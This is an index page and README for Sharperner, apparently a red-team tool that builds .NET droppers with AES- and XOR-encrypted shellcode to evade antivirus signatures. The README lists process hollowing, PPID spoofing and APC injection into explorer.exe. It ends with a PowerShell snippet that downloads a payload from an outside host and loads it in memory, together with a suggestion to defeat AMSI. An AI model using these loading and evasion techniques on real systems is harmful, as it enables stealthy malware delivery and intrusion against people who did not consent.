Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/aniqfakhrul/Sharperner
Simple executable generator with encrypted shellcode.
https://github.com/aniqfakhrul/Sharperner
Last synced: 3 months ago
JSON representation
Simple executable generator with encrypted shellcode.
- Host: GitHub
- URL: https://github.com/aniqfakhrul/Sharperner
- Owner: aniqfakhrul
- Created: 2021-06-05T10:44:59.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2022-10-03T03:37:50.000Z (about 2 years ago)
- Last Synced: 2024-05-07T00:35:55.461Z (6 months ago)
- Language: C#
- Homepage:
- Size: 5.18 MB
- Stars: 279
- Watchers: 9
- Forks: 69
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - aniqfakhrul/Sharperner - Simple executable generator with encrypted shellcode. (C# #)
README
# Sharperner
**Sharperner** is a tool written in CSharp that generate .NET dropper with AES and XOR obfuscated shellcode. Generated executable can possibly bypass signature check but I cant be sure it can bypass heuristic scanning.
## Features
### PE binary
* Process Hollowing
* PPID Spoofing
* Random generated AES key and iv
* Final Shellcode, Key and IV are translated to morse code :)
### .NET binary
* AES + XOR encrypted shellcode
* APC Process Injection (explorer.exe)
* Random function names
* Random generated AES key and iv
* Final Shellcode, Key and IV are translated to morse code :)
## Usage
```
/file B64,hex,raw shellcode
/type cs,cpp
/out Output file Location (Optional)
Example:
Sharperner.exe /file:file.txt /type:cpp
Sharperner.exe /file:file.txt /out:payload.exe
```
## Suggestion
To avoid touching the disk, Generated .NET executable can be loaded reflectively with powershell. AMSI is the enemy now, [amsi.fail](https://amsi.fail) ftw!
```powershell
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/payload.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[TotallyNotMal.Program]::Main()
```